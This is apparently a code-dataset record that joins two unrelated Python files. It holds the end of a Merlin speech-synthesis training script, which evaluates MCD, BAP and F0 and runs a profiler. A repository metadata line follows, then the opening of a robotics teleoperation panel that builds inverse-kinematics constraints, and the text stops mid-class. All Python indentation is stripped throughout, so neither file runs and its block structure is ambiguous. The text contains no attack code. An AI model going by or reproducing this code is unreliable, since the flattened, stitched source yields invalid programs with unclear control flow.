logger.critical('denormalising method %s is not supported!\n' %(cfg.output_feature_normalisation))
raise
##perform MLPG to smooth parameter trajectory
## lf0 is included, the output features much have vuv.
generator = ParameterGeneration(gen_wav_features = cfg.gen_wav_features)
generator.acoustic_decomposition(gen_file_list, cfg.cmp_dim, cfg.out_dimension_dict, cfg.file_extension_dict, var_file_dict)
### generate wav
if cfg.GENWAV:
logger.info('reconstructing waveform(s)')
print(len(gen_file_id_list))
generate_wav(gen_dir, gen_file_id_list[cfg.valid_file_number:cfg.valid_file_number+cfg.test_file_number], cfg) # generated speech
# generate_wav(nn_cmp_dir, gen_file_id_list) # reference copy synthesis speech
### evaluation: calculate distortion
if cfg.CALMCD:
logger.info('calculating MCD')
ref_data_dir = os.path.join(data_dir, 'ref_data')
ref_mgc_list = prepare_file_path_list(gen_file_id_list, ref_data_dir, cfg.mgc_ext)
ref_bap_list = prepare_file_path_list(gen_file_id_list, ref_data_dir, cfg.bap_ext)
ref_lf0_list = prepare_file_path_list(gen_file_id_list, ref_data_dir, cfg.lf0_ext)
in_gen_label_align_file_list = in_label_align_file_list[cfg.train_file_number:cfg.train_file_number+cfg.valid_file_number+cfg.test_file_number]
calculator = IndividualDistortionComp()
spectral_distortion = 0.0
bap_mse = 0.0
f0_mse = 0.0
vuv_error = 0.0
valid_file_id_list = file_id_list[cfg.train_file_number:cfg.train_file_number+cfg.valid_file_number]
test_file_id_list = file_id_list[cfg.train_file_number+cfg.valid_file_number:cfg.train_file_number+cfg.valid_file_number+cfg.test_file_number]
if cfg.remove_silence_using_binary_labels:
## get lab_dim:
label_composer = LabelComposer()
label_composer.load_label_configuration(cfg.label_config_file)
lab_dim=label_composer.compute_label_dimension()
## use first feature in label -- hardcoded for now
silence_feature = 0
## Use these to trim silence:
untrimmed_test_labels = binary_label_file_list[cfg.train_file_number:cfg.train_file_number+cfg.valid_file_number+cfg.test_file_number]
if 'mgc' in cfg.in_dimension_dict:
if cfg.remove_silence_using_binary_labels:
untrimmed_reference_data = in_file_list_dict['mgc'][cfg.train_file_number:cfg.train_file_number+cfg.valid_file_number+cfg.test_file_number]
trim_silence(untrimmed_reference_data, ref_mgc_list, cfg.mgc_dim, \
untrimmed_test_labels, lab_dim, silence_feature)
else:
remover = SilenceRemover(n_cmp = cfg.mgc_dim, silence_pattern = cfg.silence_pattern)
remover.remove_silence(in_file_list_dict['mgc'][cfg.train_file_number:cfg.train_file_number+cfg.valid_file_number+cfg.test_file_number], in_gen_label_align_file_list, ref_mgc_list)
valid_spectral_distortion = calculator.compute_distortion(valid_file_id_list, ref_data_dir, gen_dir, cfg.mgc_ext, cfg.mgc_dim)
test_spectral_distortion = calculator.compute_distortion(test_file_id_list , ref_data_dir, gen_dir, cfg.mgc_ext, cfg.mgc_dim)
valid_spectral_distortion *= (10 /numpy.log(10)) * numpy.sqrt(2.0) ##MCD
test_spectral_distortion *= (10 /numpy.log(10)) * numpy.sqrt(2.0) ##MCD
if 'bap' in cfg.in_dimension_dict:
if cfg.remove_silence_using_binary_labels:
untrimmed_reference_data = in_file_list_dict['bap'][cfg.train_file_number:cfg.train_file_number+cfg.valid_file_number+cfg.test_file_number]
trim_silence(untrimmed_reference_data, ref_bap_list, cfg.bap_dim, \
untrimmed_test_labels, lab_dim, silence_feature)
else:
remover = SilenceRemover(n_cmp = cfg.bap_dim, silence_pattern = cfg.silence_pattern)
remover.remove_silence(in_file_list_dict['bap'][cfg.train_file_number:cfg.train_file_number+cfg.valid_file_number+cfg.test_file_number], in_gen_label_align_file_list, ref_bap_list)
valid_bap_mse = calculator.compute_distortion(valid_file_id_list, ref_data_dir, gen_dir, cfg.bap_ext, cfg.bap_dim)
test_bap_mse = calculator.compute_distortion(test_file_id_list , ref_data_dir, gen_dir, cfg.bap_ext, cfg.bap_dim)
valid_bap_mse = valid_bap_mse / 10.0 ##Cassia's bap is computed from 10*log|S(w)|. if use HTS/SPTK style, do the same as MGC
test_bap_mse = test_bap_mse / 10.0 ##Cassia's bap is computed from 10*log|S(w)|. if use HTS/SPTK style, do the same as MGC
if 'lf0' in cfg.in_dimension_dict:
if cfg.remove_silence_using_binary_labels:
untrimmed_reference_data = in_file_list_dict['lf0'][cfg.train_file_number:cfg.train_file_number+cfg.valid_file_number+cfg.test_file_number]
trim_silence(untrimmed_reference_data, ref_lf0_list, cfg.lf0_dim, \
untrimmed_test_labels, lab_dim, silence_feature)
else:
remover = SilenceRemover(n_cmp = cfg.lf0_dim, silence_pattern = cfg.silence_pattern)
remover.remove_silence(in_file_list_dict['lf0'][cfg.train_file_number:cfg.train_file_number+cfg.valid_file_number+cfg.test_file_number], in_gen_label_align_file_list, ref_lf0_list)
valid_f0_mse, valid_vuv_error = calculator.compute_distortion(valid_file_id_list, ref_data_dir, gen_dir, cfg.lf0_ext, cfg.lf0_dim)
test_f0_mse , test_vuv_error = calculator.compute_distortion(test_file_id_list , ref_data_dir, gen_dir, cfg.lf0_ext, cfg.lf0_dim)
logger.info('Develop: DNN -- MCD: %.3f dB; BAP: %.3f dB; F0: %.3f Hz; VUV: %.3f%%' \
%(valid_spectral_distortion, valid_bap_mse, valid_f0_mse, valid_vuv_error*100.))
logger.info('Test : DNN -- MCD: %.3f dB; BAP: %.3f dB; F0: %.3f Hz; VUV: %.3f%%' \
%(test_spectral_distortion , test_bap_mse , test_f0_mse , test_vuv_error*100.))
if __name__ == '__main__':
# these things should be done even before trying to parse the command line
# create a configuration instance
# and get a short name for this instance
cfg=configuration.cfg
# set up logging to use our custom class
logging.setLoggerClass(LoggerPlotter)
# get a logger for this main function
logger = logging.getLogger("main")
if len(sys.argv) != 2:
logger.critical('usage: run_dnn.sh [config file name]')
sys.exit(1)
config_file = sys.argv[1]
config_file = os.path.abspath(config_file)
cfg.configure(config_file)
if cfg.profile:
logger.info('profiling is activated')
import cProfile, pstats
cProfile.run('main_function(cfg)', 'mainstats')
# create a stream for the profiler to write to
profiling_output = io.StringIO()
p = pstats.Stats('mainstats', stream=profiling_output)
# print stats to that stream
# here we just report the top 10 functions, sorted by total amount of time spent in each
p.strip_dirs().sort_stats('tottime').print_stats(10)
# print the result to the log
logger.info('---Profiling result follows---\n%s' % profiling_output.getvalue() )
profiling_output.close()
logger.info('---End of profiling result---')
else:
main_function(cfg)
# if gnp._boardId is not None:
# import gpu_lock
# gpu_lock.free_lock(gnp._boardId)
sys.exit(0)
|
bajibabu/merlin
|
misc/recipes/MGE/run_dnn_cm.py
|
Python
|
apache-2.0
| 42,653
|
[
"NEURON"
] |
6ba5a764431219b56a3df6ce0a655a29b3e24b18db7e499494b7df1282e3a838
|
import PythonQt
from PythonQt import QtCore, QtGui, QtUiTools
import director.applogic as app
import director.objectmodel as om
from director.timercallback import TimerCallback
from director import robotstate
from director import visualization as vis
from director import transformUtils
from director import ikconstraints
from director import ikplanner
from director import vtkAll as vtk
from director import drcargs
from director import affordanceurdf
from director.roboturdf import HandFactory
from director.utime import getUtime
from director import lcmUtils
import functools
import math
import numpy as np
import types
import lcm
import bot_core as lcmbotcore
def addWidgetsToDict(widgets, d):
for widget in widgets:
if widget.objectName:
d[str(widget.objectName)] = widget
addWidgetsToDict(widget.children(), d)
class WidgetDict(object):
def __init__(self, widgets):
addWidgetsToDict(widgets, self.__dict__)
def clearLayout(w):
children = w.findChildren(QtGui.QWidget)
for child in children:
child.delete()
class ConstraintItem(om.ObjectModelItem):
def __init__(self, constraint):
linkStr = '(%s)' % constraint.linkName if hasattr(constraint, 'linkName') else ''
name = '%s %s' % (type(constraint).__name__, linkStr)
om.ObjectModelItem.__init__(self, name)
self.constraint = constraint
for propertyName, propertyValue in constraint:
if isinstance(propertyValue, np.ndarray):
propertyValue = propertyValue.tolist()
if isinstance(propertyValue, vtk.vtkTransform):
propertyValue = list(propertyValue.GetPosition()) + list(propertyValue.GetOrientation())
self.addProperty(propertyName, propertyValue, attributes=om.PropertyAttributes(decimals=3, minimum=-100, maximum=100))
def _onPropertyChanged(self, propertySet, propertyName):
om.ObjectModelItem._onPropertyChanged(self, propertySet, propertyName)
self.constraint.__setattr__(propertyName, propertySet.getProperty(propertyName))
class EndEffectorTeleopPanel(object):
def __init__(self, panel):
self.panel = panel
self.ui = panel.ui
self.ui.eeTeleopButton.connect('clicked()', self.teleopButtonClicked)
self.ui.planButton.connect('clicked()', self.planClicked)
self.ui.updateIkButton.connect('clicked()', self.onUpdateIkClicked)
self.ui.baseCombo.connect('currentIndexChanged(const QString&)', self.baseComboChanged)
self.ui.backCombo.connect('currentIndexChanged(const QString&)', self.backComboChanged)
self.ui.lhandCombo.connect('currentIndexChanged(const QString&)', self.lhandComboChanged)
self.ui.rhandCombo.connect('currentIndexChanged(const QString&)', self.rhandComboChanged)
self.ui.lfootCombo.connect('currentIndexChanged(const QString&)', self.lfootComboChanged)
self.ui.rfootCombo.connect('currentIndexChanged(const QString&)', self.rfootComboChanged)
self.ui.leftFootPlanningSupportCheckbox.connect('toggled(bool)', self.leftFootPlanningSupportCheckboxChanged)
self.ui.rightFootPlanningSupportCheckbox.connect('toggled(bool)', self.rightFootPlanningSupportCheckboxChanged)
self.ui.leftHandPlanningSupportCheckbox.connect('toggled(bool)', self.leftHandPlanningSupportCheckboxChanged)
self.ui.rightHandPlanningSupportCheckbox.connect('toggled(bool)', self.rightHandPlanningSupportCheckboxChanged)
self.ui.pelvisPlanningSupportCheckbox.connect('toggled(bool)', self.pelvisPlanningSupportCheckboxChanged)
self.ui.leftFootExecutionSupportCheckbox.connect('toggled(bool)', self.leftFootExecutionSupportCheckboxChanged)
self.ui.rightFootExecutionSupportCheckbox.connect('toggled(bool)', self.rightFootExecutionSupportCheckboxChanged)
self.ui.leftHandExecutionSupportCheckbox.connect('toggled(bool)', self.leftHandExecutionSupportCheckboxChanged)
self.ui.rightHandExecutionSupportCheckbox.connect('toggled(bool)', self.rightHandExecutionSupportCheckboxChanged)
self.ui.pelvisExecutionSupportCheckbox.connect('toggled(bool)', self.pelvisExecutionSupportCheckboxChanged)
self.ui.executionSupportCheckbox.connect('toggled(bool)', self.executionSupportCheckboxChanged)
self.ui.finalPosePlanningOptions.connect('toggled(bool)', self.finalPosePlanningChanged)
self.ui.searchFinalPoseButton.connect('clicked()', self.searchFinalPoseClicked)
self.ui.rightGraspingHandButton.connect('clicked()', self.rightGraspingHandButtonClicked)
self.ui.leftGraspingHandButton.connect('clicked()', self.leftGraspingHandButtonClicked)
self.palmOffsetDistance = 0.0
self.palmGazeAxis = [0.0, 1.0, 0.0]
self.constraintSet = None
lcmUtils.addSubscriber('CANDIDATE_ROBOT_ENDPOSE', lcmbotcore.robot_state_t, self.onCandidateEndPose)
#self.ui.interactiveCheckbox.visible = False
#self.ui.updateIkButton.visible = False
if 'kneeJointLimits' in drcargs.getDirectorConfig():
self.kneeJointLimits = drcargs.getDirectorConfig()['kneeJointLimits']
def setComboText(self, combo, text):
index = combo.findText(text)
assert index >= 0
combo.setCurrentIndex(index)
def getComboText(self, combo):
return str(combo.currentText)
def setCheckboxState(self, checkbox, state):
assert type(state) is types.BooleanType
checkbox.checked = state
def getCheckboxState(self, checkbox):
return checkbox.checked
def getBaseConstraint(self):
return self.getComboText(self.ui.baseCombo)
def setBaseConstraint(self, value):
return self.setComboText(self.ui.baseCombo, value)
def getBackConstraint(self):
return self.getComboText(self.ui.backCombo)
def setBackConstraint(self, value):
return self.setComboText(self.ui.backCombo, value)
def getLHandConstraint(self):
return self.getComboText(self.ui.lhandCombo)
def setLHandConstraint(self, value):
return self.setComboText(self.ui.lhandCombo, value)
def getRHandConstraint(self):
return self.getComboText(self.ui.rhandCombo)
def setRHandConstraint(self, value):
return self.setComboText(self.ui.rhandCombo, value)
def getLFootConstraint(self):
return self.getComboText(self.ui.lfootCombo)
def setLFootConstraint(self, value):
return self.setComboText(self.ui.lfootCombo, value)
def getRFootConstraint(self):
return self.getComboText(self.ui.rfootCombo)
def setRFootConstraint(self, value):
return self.setComboText(self.ui.rfootCombo, value)
def getLFootPlanningSupportEnabled(self):
return self.getCheckboxState(self.ui.leftFootPlanningSupportCheckbox)
def setLFootPlanningSupportEnabled(self, value):
self.setCheckboxState(self.ui.leftFootPlanningSupportCheckbox, value)
def getRFootPlanningSupportEnabled(self):
return self.getCheckboxState(self.ui.rightFootPlanningSupportCheckbox)
def setRFootPlanningSupportEnabled(self, value):
self.setCheckboxState(self.ui.rightFootPlanningSupportCheckbox, value)
def getLHandPlanningSupportEnabled(self):
return self.getCheckboxState(self.ui.leftHandPlanningSupportCheckbox)
def setLHandPlanningSupportEnabled(self, value):
self.setCheckboxState(self.ui.leftHandPlanningSupportCheckbox, value)
def getRHandPlanningSupportEnabled(self):
return self.getCheckboxState(self.ui.rightHandPlanningSupportCheckbox)
def setRHandPlanningSupportEnabled(self, value):
self.setCheckboxState(self.ui.rightHandPlanningSupportCheckbox, value)
def getPelvisPlanningSupportEnabled(self):
return self.getCheckboxState(self.ui.pelvisPlanningSupportCheckbox)
def setPelvisPlanningSupportEnabled(self, value):
self.setCheckboxState(self.ui.pelvisPlanningSupportCheckbox, value)
def getLFootExecutionSupportEnabled(self):
return self.getCheckboxState(self.ui.leftFootExecutionSupportCheckbox)
def setLFootExecutionSupportEnabled(self, value):
self.setCheckboxState(self.ui.leftFootExecutionSupportCheckbox, value)
def getRFootExecutionSupportEnabled(self):
return self.getCheckboxState(self.ui.rightFootExecutionSupportCheckbox)
def setRFootExecutionSupportEnabled(self, value):
self.setCheckboxState(self.ui.rightFootExecutionSupportCheckbox, value)
def getLHandExecutionSupportEnabled(self):
return self.getCheckboxState(self.ui.leftHandExecutionSupportCheckbox)
def setLHandExecutionSupportEnabled(self, value):
self.setCheckboxState(self.ui.leftHandExecutionSupportCheckbox, value)
def getRHandExecutionSupportEnabled(self):
return self.getCheckboxState(self.ui.rightHandExecutionSupportCheckbox)
def setRHandExecutionSupportEnabled(self, value):
self.setCheckboxState(self.ui.rightHandExecutionSupportCheckbox, value)
def getPelvisExecutionSupportEnabled(self):
return self.getCheckboxState(self.ui.pelvisExecutionSupportCheckbox)
def setPelvisExecutionSupportEnabled(self, value):
self.setCheckboxState(self.ui.pelvisExecutionSupportCheckbox, value)
def getExecutionSupportEnabled(self):
return self.getCheckboxState(self.ui.executionSupportCheckbox)
def baseComboChanged(self):
self.updateConstraints()
def backComboChanged(self):
self.updateConstraints()
def lhandComboChanged(self):
self.updateConstraints()
def rhandComboChanged(self):
self.updateConstraints()
def lfootComboChanged(self):
self.updateConstraints()
def rfootComboChanged(self):
self.updateConstraints()
def leftFootExecutionSupportCheckboxChanged(self):
if not self.getLFootExecutionSupportEnabled():
self.setLFootPlanningSupportEnabled(False)
self.panel.manipPlanner.leftFootSupportEnabled = self.getLFootExecutionSupportEnabled()
self.updateQuasistaticFlag()
def rightFootExecutionSupportCheckboxChanged(self):
if not self.getRFootExecutionSupportEnabled():
self.setRFootPlanningSupportEnabled(False)
self.panel.manipPlanner.rightFootSupportEnabled = self.getRFootExecutionSupportEnabled()
self.updateQuasistaticFlag()
def leftHandExecutionSupportCheckboxChanged(self):
if not self.getLHandExecutionSupportEnabled():
self.setLHandPlanningSupportEnabled(False)
self.panel.manipPlanner.leftHandSupportEnabled = self.getLHandExecutionSupportEnabled()
self.updateQuasistaticFlag()
def rightHandExecutionSupportCheckboxChanged(self):
if not self.getRHandExecutionSupportEnabled():
self.setRHandPlanningSupportEnabled(False)
self.panel.manipPlanner.rightHandSupportEnabled = self.getRHandExecutionSupportEnabled()
self.updateQuasistaticFlag()
def pelvisExecutionSupportCheckboxChanged(self):
if not self.getPelvisExecutionSupportEnabled():
self.setPelvisPlanningSupportEnabled(False)
self.panel.manipPlanner.pelvisSupportEnabled = self.getPelvisExecutionSupportEnabled()
self.updateQuasistaticFlag()
def executionSupportCheckboxChanged(self):
self.updateQuasistaticFlag()
self.panel.manipPlanner.setPublishPlansWithSupports(self.getExecutionSupportEnabled())
def leftFootPlanningSupportCheckboxChanged(self):
if self.getLFootPlanningSupportEnabled():
self.setLFootExecutionSupportEnabled(True)
self.updatePlanningSupports()
self.updateConstraints()
def rightFootPlanningSupportCheckboxChanged(self):
if self.getRFootPlanningSupportEnabled():
self.setRFootExecutionSupportEnabled(True)
self.updatePlanningSupports()
self.updateConstraints()
def leftHandPlanningSupportCheckboxChanged(self):
if self.getLHandPlanningSupportEnabled():
self.setLHandExecutionSupportEnabled(True)
self.updatePlanningSupports()
self.updateConstraints()
def rightHandPlanningSupportCheckboxChanged(self):
if self.getRHandPlanningSupportEnabled():
self.setRHandExecutionSupportEnabled(True)
self.updatePlanningSupports()
self.updateConstraints()
def pelvisPlanningSupportCheckboxChanged(self):
if self.getPelvisPlanningSupportEnabled():
self.setPelvisExecutionSupportEnabled(True)
self.updatePlanningSupports()
self.updateConstraints()
def updateQuasistaticFlag(self):
lfootEnabled = self.getLFootExecutionSupportEnabled()
rfootEnabled = self.getRFootExecutionSupportEnabled()
lhandEnabled = self.getLHandExecutionSupportEnabled()
rhandEnabled = self.getRHandExecutionSupportEnabled()
pelvisEnabled = self.getPelvisExecutionSupportEnabled()
if (lhandEnabled or rhandEnabled or pelvisEnabled) or (lfootEnabled and rfootEnabled):
self.panel.manipPlanner.plansWithSupportsAreQuasistatic = True
else:
self.panel.manipPlanner.plansWithSupportsAreQuasistatic = False
def onGoalFrameModified(self, frame):
if self.constraintSet and self.ui.interactiveCheckbox.checked:
self.updateIk()
def onUpdateIkClicked(self):
self.updateIk()
def updateIk(self):
endPose, info = self.constraintSet.runIk()
self.panel.showPose(self.constraintSet.endPose)
app.displaySnoptInfo(info)
def updateCollisionEnvironment(self):
# the collision environment is only supported by the matlab backend ik planner
if self.panel.ikPlanner.planningMode != 'matlabdrake':
return
affs = self.panel.affordanceManager.getCollisionAffordances()
if not affs:
self.panel.ikPlanner.ikServer.clearEnvironment()
else:
urdfStr = affordanceurdf.urdfStringFromAffordances(affs)
self.panel.ikPlanner.ikServer.setEnvironment(urdfStr)
def planClicked(self):
if not self.ui.eeTeleopButton.checked and not self.getCheckboxState(self.ui.finalPosePlanningOptions):
return
self.updateCollisionEnvironment()
self.generatePlan()
def generatePlan(self):
self.updateConstraints()
if not self.ui.interactiveCheckbox.checked:
self.updateIk()
if self.getCheckboxState(self.ui.finalPosePlanningOptions):
self.constraintSet.endPose = self.panel.ikPlanner.jointController.poses['reach_end']
# todo- need an option here
goalMode = ikplanner.getIkOptions().getProperty('Goal planning mode')
if goalMode == 1 or ikplanner.getIkOptions().getPropertyEnumValue('Use collision') == 'RRT Connect':
plan = self.constraintSet.runIkTraj()
elif ikplanner.getIkOptions().getPropertyEnumValue('Use collision') == 'RRT*':
collisionEndEffectorName = ( self.panel.ikPlanner.handModels[0].handLinkName if self.constraintSet.ikParameters.rrtHand == 'left'
else self.panel.ikPlanner.handModels[1].handLinkName )
constraintToRemove = []
for constraint in self.constraintSet.constraints:
if hasattr(constraint, 'linkName') and constraint.linkName == collisionEndEffectorName:
constraintToRemove.append(constraint)
for constraint in constraintToRemove:
self.constraintSet.constraints.remove(constraint)
plan = self.constraintSet.runIkTraj()
else:
plan = self.constraintSet.planEndPoseGoal()
self.panel.showPlan(plan)
def teleopButtonClicked(self):
if self.ui.eeTeleopButton.checked:
self.setCheckboxState(self.ui.finalPosePlanningOptions, False)
self.activate()
else:
self.deactivate()
def activate(self):
self.ui.eeTeleopButton.blockSignals(True)
self.ui.eeTeleopButton.checked = True
self.ui.eeTeleopButton.blockSignals(False)
self.panel.endEffectorTeleopActivated()
self.createGoalFrames()
self.updateConstraints()
def deactivate(self):
self.ui.eeTeleopButton.blockSignals(True)
self.ui.eeTeleopButton.checked = False
self.ui.eeTeleopButton.blockSignals(False)
self.removePlanFolder()
self.panel.endEffectorTeleopDeactivated()
@staticmethod
def getGoalFrame(linkName):
return om.findObjectByName('%s constraint frame' % linkName)
def updateGoalFrame(self, linkName, transform):
goalFrame = self.getGoalFrame(linkName)
if not goalFrame:
return
goalFrame.copyFrame(transform)
return goalFrame
def updatePlanningSupports(self):
self.panel.ikPlanner.leftFootSupportEnabled = self.getLFootPlanningSupportEnabled()
self.panel.ikPlanner.rightFootSupportEnabled = self.getRFootPlanningSupportEnabled()
self.panel.ikPlanner.leftHandSupportEnabled = self.getLHandPlanningSupportEnabled()
self.panel.ikPlanner.rightHandSupportEnabled = self.getRHandPlanningSupportEnabled()
self.panel.ikPlanner.pelvisSupportEnabled = self.getPelvisPlanningSupportEnabled()
def updateConstraints(self):
if not self.ui.eeTeleopButton.checked and not self.getCheckboxState(self.ui.finalPosePlanningOptions):
return
self.updatePlanningSupports()
ikPlanner = self.panel.ikPlanner
startPoseName = 'reach_start'
startPose = self.panel.planningUtils.getPlanningStartPose()
ikPlanner.addPose(startPose, startPoseName)
# Humanoid, i.e. robot has feet and is not a fixed base arm
if not ikPlanner.fixedBaseArm and not ikPlanner.robotNoFeet:
constraints = []
constraints.append(ikPlanner.createQuasiStaticConstraint())
constraints.append(ikPlanner.createLockedNeckPostureConstraint(startPoseName))
if self.getLFootConstraint() == 'fixed':
constraints.append(ikPlanner.createFixedLinkConstraints(startPoseName, ikPlanner.leftFootLink, tspan=[0.0, 1.0], lowerBound=-0.0001*np.ones(3), upperBound=0.0001*np.ones(3), angleToleranceInDegrees=0.1))
elif self.getLFootConstraint() == 'constrained':
constraints.extend(ikPlanner.createSixDofLinkConstraints(startPoseName, ikPlanner.leftFootLink, tspan=[1.0, 1.0]))
elif self.getLFootConstraint() == 'sliding':
constraints.extend(ikPlanner.createSlidingFootConstraints(startPoseName)[:2])
if self.getRFootConstraint() == 'fixed':
constraints.append(ikPlanner.createFixedLinkConstraints(startPoseName, ikPlanner.rightFootLink, tspan=[0.0, 1.0], lowerBound=-0.0001*np.ones(3), upperBound=0.0001*np.ones(3), angleToleranceInDegrees=0.1))
elif self.getRFootConstraint() == 'constrained':
constraints.extend(ikPlanner.createSixDofLinkConstraints(startPoseName, ikPlanner.rightFootLink, tspan=[1.0, 1.0]))
elif self.getRFootConstraint() == 'sliding':
constraints.extend(ikPlanner.createSlidingFootConstraints(startPoseName)[2:])
if self.getBackConstraint() == 'fixed':
constraints.append(ikPlanner.createLockedBackPostureConstraint(startPoseName))
ikPlanner.setBackLocked(True)
elif self.getBackConstraint() == 'limited':
constraints.append(ikPlanner.createMovingBackLimitedPostureConstraint())
ikPlanner.setBackLocked(False)
elif self.getBackConstraint() == 'free':
constraints.append(ikPlanner.createMovingBackPostureConstraint())
ikPlanner.setBackLocked(False)
if self.getBaseConstraint() == 'fixed':
constraints.append(ikPlanner.createLockedBasePostureConstraint(startPoseName, lockLegs=False))
ikPlanner.setBaseLocked(True)
if self.getBaseConstraint() == 'constrained':
constraints.extend(ikPlanner.createSixDofLinkConstraints(startPoseName, ikPlanner.pelvisLink, tspan=[1.0, 1.0]))
ikPlanner.setBaseLocked(False)
elif self.getBaseConstraint() == 'xyz only':
constraints.append(ikPlanner.createXYZMovingBasePostureConstraint(startPoseName))
constraints.append(ikPlanner.createKneePostureConstraint(self.kneeJointLimits))
ikPlanner.setBaseLocked(False)
elif self.getBaseConstraint() == 'z only':
constraints.append(ikPlanner.createZMovingBasePostureConstraint(startPoseName))
constraints.append(ikPlanner.createKneePostureConstraint(self.kneeJointLimits))
ikPlanner.setBaseLocked(False)
elif self.getBaseConstraint() == 'limited':
constraints.append(ikPlanner.createMovingBaseSafeLimitsConstraint())
constraints.append(ikPlanner.createKneePostureConstraint(self.kneeJointLimits))
ikPlanner.setBaseLocked(False)
elif self.getBaseConstraint() == 'free':
constraints.append(ikPlanner.createKneePostureConstraint(self.kneeJointLimits))
ikPlanner.setBaseLocked(False)
# Fixed Base Arm: Remove all except the fixed base constraint
if ikPlanner.fixedBaseArm:
constraints = []
constraints.append(ikPlanner.createLockedBasePostureConstraint(startPoseName, lockLegs=False))
if ikPlanner.robotNoFeet:
constraints = []
constraints.append(ikPlanner.createLockedBasePostureConstraint(startPoseName))
# Only add Back constraints if robot has a back
if ikPlanner.getJointGroup('Back'):
if self.getBackConstraint() == 'fixed':
constraints.append(ikPlanner.createLockedBackPostureConstraint(startPoseName))
ikPlanner.setBackLocked(True)
elif self.getBackConstraint() == 'limited':
constraints.append(ikPlanner.createMovingBackLimitedPostureConstraint())
ikPlanner.setBackLocked(False)
elif self.getBackConstraint() == 'free':
constraints.append(ikPlanner.createMovingBackPostureConstraint())
ikPlanner.setBackLocked(False)
# Don't generate end effector constraints if in final pose planning
if not self.getCheckboxState(self.ui.finalPosePlanningOptions):
for handModel in ikPlanner.handModels:
side = handModel.side
if (side == "left"):
thisHandConstraint = self.getLHandConstraint()
elif (side == "right"):
thisHandConstraint = self.getRHandConstraint()
linkName = ikPlanner.getHandLink(side)
graspToHand = ikPlanner.newPalmOffsetGraspToHandFrame(side, self.palmOffsetDistance)
graspToWorld = self.getGoalFrame(linkName)
p, q = ikPlanner.createPositionOrientationGraspConstraints(side, graspToWorld, graspToHand)
g = ikPlanner.createGazeGraspConstraint(side, graspToWorld, graspToHand, targetAxis=list(self.palmGazeAxis), bodyAxis=list(self.palmGazeAxis))
p.tspan = [1.0, 1.0]
q.tspan = [1.0, 1.0]
g.tspan = [1.0, 1.0]
if thisHandConstraint == 'arm fixed':
if (side == "left"):
constraints.append(ikPlanner.createLockedLeftArmPostureConstraint(startPoseName))
elif (side == "right"):
constraints.append(ikPlanner.createLockedRightArmPostureConstraint(startPoseName))
ikPlanner.setArmLocked(side,True)
elif thisHandConstraint == 'ee fixed':
constraints.extend([p, q])
ikPlanner.setArmLocked(side,False)
elif thisHandConstraint == 'position':
constraints.extend([p])
ikPlanner.setArmLocked(side,False)
elif thisHandConstraint == 'gaze':
constraints.extend([p, g])
ikPlanner.setArmLocked(side,False)
elif thisHandConstraint == 'orbit':
graspToHand = ikPlanner.newPalmOffsetGraspToHandFrame(side, distance=0.07)
constraints.extend(ikPlanner.createGraspOrbitConstraints(side, graspToWorld, graspToHand))
constraints[-3].tspan = [1.0, 1.0]
if ikPlanner.defaultIkParameters.useCollision != 'none':
constraints[-2].tspan = [0.5, 1.0]
constraints[-1].tspan = [0.5, 1.0]
else:
constraints[-2].tspan = [1.0, 1.0]
constraints[-1].tspan = [1.0, 1.0]
ikPlanner.setArmLocked(side,False)
elif thisHandConstraint == 'free':
ikPlanner.setArmLocked(side,False)
if hasattr(self,'reachSide'):
if self.reachSide == 'left':
endEffectorName = ikPlanner.handModels[0].handLinkName # 'l_hand'
else:
endEffectorName = ikPlanner.handModels[1].handLinkName # 'r_hand'
constraints.append(ikPlanner.createActiveEndEffectorConstraint(endEffectorName,ikPlanner.getPalmPoint(self.reachSide)))
self.constraintSet = ikplanner.ConstraintSet(ikPlanner, constraints, 'reach_end', startPoseName)
handLinks = []
for handModel in ikPlanner.handModels: handLinks.append(handModel.handLinkName)
for constraint in constraints:
if hasattr(constraint, 'linkName') and constraint.linkName in handLinks:
continue
if isinstance(constraint, ikconstraints.PositionConstraint):
frameObj = self.getGoalFrame(constraint.linkName)
if frameObj:
constraint.referenceFrame = frameObj.transform
elif isinstance(constraint, ikconstraints.QuatConstraint):
frameObj = self.getGoalFrame(constraint.linkName)
if frameObj:
constraint.quaternion = frameObj.transform
elif isinstance(constraint, ikconstraints.WorldGazeDirConstraint):
frameObj = self.getGoalFrame(constraint.linkName)
if frameObj:
constraint.targetFrame = frameObj.transform
if not self.getCheckboxState(self.ui.finalPosePlanningOptions):
self.onGoalFrameModified(None)
om.removeFromObjectModel(self.getConstraintFolder())
folder = self.getConstraintFolder()
for i, pc in enumerate(constraints):
constraintItem = ConstraintItem(pc)
om.addToObjectModel(constraintItem, parentObj=folder)
def addHandMesh(self, handModel, goalFrame):
handObj = handModel.newPolyData('reach goal left hand', self.panel.teleopRobotModel.views[0], parent=goalFrame)
handFrame = handObj.children()[0]
handFrame.copyFrame(goalFrame.transform)
frameSync = vis.FrameSync()
frameSync.addFrame(goalFrame)
frameSync.addFrame(handFrame)
goalFrame.sync = frameSync
@staticmethod
def removePlanFolder():
om.removeFromObjectModel(om.findObjectByName('teleop plan'))
@staticmethod
def getConstraintFrameFolder():
return om.getOrCreateContainer('constraint frames', parentObj=om.getOrCreateContainer('teleop plan', parentObj=om.findObjectByName('planning')))
@staticmethod
def getConstraintFolder():
return om.getOrCreateContainer('ik constraints', parentObj=om.getOrCreateContainer('teleop plan', parentObj=om.findObjectByName('planning')))
def createGoalFrames(self):
ikPlanner = self.panel.ikPlanner
startPose = self.panel.planningUtils.getPlanningStartPose()
self.removePlanFolder()
folder = self.getConstraintFrameFolder()
for handModel in ikPlanner.handModels:
side = handModel.side
linkName = ikPlanner.getHandLink(side)
frameName = '%s constraint frame' % linkName
graspToHand = ikPlanner.newPalmOffsetGraspToHandFrame(side, self.palmOffsetDistance)
graspToWorld = ikPlanner.newGraspToWorldFrame(startPose, side, graspToHand)
om.removeFromObjectModel(om.findObjectByName(frameName))
frame = vis.showFrame(graspToWorld, frameName, parent=folder, scale=0.2)
#frame.setProperty('Edit', True)
frame.connectFrameModified(self.onGoalFrameModified)
#addHandMesh(handModels[side], frame)
if not ikPlanner.fixedBaseArm and not ikPlanner.robotNoFeet:
for linkName in [ikPlanner.leftFootLink, ikPlanner.rightFootLink, ikPlanner.pelvisLink]:
frameName = linkName + ' constraint frame'
om.removeFromObjectModel(om.findObjectByName(frameName))
frame = vis.showFrame(ikPlanner.getLinkFrameAtPose(linkName, startPose), frameName, parent=folder, scale=0.2)
frame.connectFrameModified(self.onGoalFrameModified)
def newReachTeleop(self, frame, side, reachTargetObject=None):
'''
reachTarget is the object we are reaching to. For some types of plans
this object may be treated in a special way, for example, when doing
planning with collision avoidance.
'''
self.deactivate()
